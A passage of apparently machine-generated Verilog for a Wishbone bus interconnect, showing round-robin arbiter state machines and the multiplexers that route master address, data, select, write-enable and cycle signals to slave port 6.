                    if ( s6_msel_arb2_req[6] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[7] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[0] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[1] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[2] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[3] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant5:
        begin
            if (  !( s6_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[6] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[7] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[0] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[1] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[2] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[3] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[4] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant6:
        begin
            if (  !( s6_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[7] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[0] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[1] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[2] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[3] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[4] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[5] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant7:
        begin
            if (  !( s6_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[0] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[1] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[2] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[3] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[4] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[5] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[6] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s6_msel_arb3_req = { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd3 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd3 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd3 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd3 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd3 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd3 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd3 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s6_msel_arb3_state <= s6_msel_arb3_grant0;
        end
        else
        begin 
            s6_msel_arb3_state <= s6_msel_arb3_next_state;
        end
    end
    always @ (  s6_msel_arb3_state or  { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd3 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd3 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd3 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd3 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd3 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd3 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd3 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s6_msel_arb3_next_state = s6_msel_arb3_state;
        case ( s6_msel_arb3_state ) 
        s6_msel_arb3_grant0:
        begin
            if (  !( s6_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[1] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[2] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[3] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[4] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[5] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[6] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[7] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant1:
        begin
            if (  !( s6_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[2] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[3] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[4] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[5] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[6] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[7] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[0] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant2:
        begin
            if (  !( s6_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[3] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[4] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[5] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[6] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[7] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[0] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[1] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant3:
        begin
            if (  !( s6_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[4] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[5] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[6] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[7] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[0] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[1] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[2] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant4:
        begin
            if (  !( s6_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[5] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[6] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[7] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[0] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[1] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[2] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[3] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant5:
        begin
            if (  !( s6_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[6] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[7] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[0] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[1] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[2] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[3] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[4] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant6:
        begin
            if (  !( s6_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[7] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[0] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[1] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[2] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[3] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[4] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[5] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb3_grant7:
        begin
            if (  !( s6_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s6_msel_arb3_req[0] ) 
                begin
                    s6_msel_arb3_next_state = s6_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s6_msel_arb3_req[1] ) 
                    begin
                        s6_msel_arb3_next_state = s6_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s6_msel_arb3_req[2] ) 
                        begin
                            s6_msel_arb3_next_state = s6_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s6_msel_arb3_req[3] ) 
                            begin
                                s6_msel_arb3_next_state = s6_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s6_msel_arb3_req[4] ) 
                                begin
                                    s6_msel_arb3_next_state = s6_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb3_req[5] ) 
                                    begin
                                        s6_msel_arb3_next_state = s6_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb3_req[6] ) 
                                        begin
                                            s6_msel_arb3_next_state = s6_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s6_msel_pri_out or  s6_msel_arb0_state or  s6_msel_arb1_state)
    begin
        if ( s6_msel_pri_out[0] ) 
        begin
            s6_msel_sel1 = s6_msel_arb1_state;
        end
        else
        begin 
            s6_msel_sel1 = s6_msel_arb0_state;
        end
    end
    always @ (  s6_msel_pri_out or  s6_msel_arb0_state or  s6_msel_arb1_state or  s6_msel_arb2_state or  s6_msel_arb3_state)
    begin
        case ( s6_msel_pri_out ) 
        2'd0:
        begin
            s6_msel_sel2 = s6_msel_arb0_state;
        end
        2'd1:
        begin
            s6_msel_sel2 = s6_msel_arb1_state;
        end
        2'd2:
        begin
            s6_msel_sel2 = s6_msel_arb2_state;
        end
        2'd3:
        begin
            s6_msel_sel2 = s6_msel_arb3_state;
        end
        endcase
    end
    assign s6_mast_sel = ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s6_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s6_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s6_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s6_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s6_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s6_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s6_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s6_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s6_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s6_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s6_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s6_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s6_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s6_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s6_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s6_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s6_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s6_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s6_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s6_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s6_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s6_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s6_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s6_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s6_m0_data_o = s6_data_i;
    assign s6_m1_data_o = s6_data_i;
    assign s6_m2_data_o = s6_data_i;
    assign s6_m3_data_o = s6_data_i;
    assign s6_m4_data_o = s6_data_i;
    assign s6_m5_data_o = s6_data_i;
    assign s6_m6_data_o = s6_data_i;
    assign s6_m7_data_o = s6_data_i;
    always @ (  ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s6_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s6_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s6_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s6_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s6_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s6_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s6_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s6_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s6_m0_cyc_r <= m0_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m1_cyc_r <= m1_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m2_cyc_r <= m2_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m3_cyc_r <= m3_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m4_cyc_r <= m4_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m5_cyc_r <= m5_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m6_cyc_r <= m6_s6_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s6_m7_cyc_r <= m7_s6_cyc_o;
    end
    always @ (  ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) or  m0_s6_cyc_o or  m1_s6_cyc_o or  m2_s6_cyc_o or  m3_s6_cyc_o or  m4_s6_cyc_o or  m5_s6_cyc_o or  m6_s6_cyc_o or  m7_s6_cyc_o or  s6_m0_cyc_r or  s6_m1_cyc_r or  s6_m2_cyc_r or  s6_m3_cyc_r or  s6_m4_cyc_r or  s6_m5_cyc_r or  s6_m6_cyc_r or  s6_m7_cyc_r)
    begin
        case ( ( ( ( s6_pri_sel == 2'd0 ) ) ? ( s6_arb_state ) : ( ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( s6_msel_arb0_state ) : ( ( ( ( s6_msel_pri_sel == 2'd1 ) ) ? ( s6_msel_sel1 ) : ( s6_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s6_wb_cyc_o = ( m0_s6_cyc_o & s6_m0_cyc_r );
        end
        3'd1:
        begin
            s6_wb_cyc_o = ( m1_s6_cyc_o & s6_m1_cyc_r );
        end
        3'd2:
        begin
            s6_wb_cyc_o = ( m2_s6_cyc_o & s6_m2_cyc_r );
        end
        3'd3:
        begin
            s6_wb_cyc_o = ( m3_s6_cyc_o & s6_m3_cyc_r );
        end
        3'd4:
        begin
            s6_wb_cyc_o = ( m4_s6_cyc_o & s6_m4_cyc_r );
        end
        3'd5:
        begin
            s6_wb_cyc_o = ( m5_s6_cyc_o & s6_m5_cyc_r );
        end
        3'd6:
        begin
            s6_wb_cyc_o = ( m6_s6_cyc_o & s6_m6_cyc_r );
        end
        3'd7:
        begin
            s6_wb_cyc_o = ( m7_s6_cyc_o & s6_m7_cyc_r );
        end
        endcase
    end
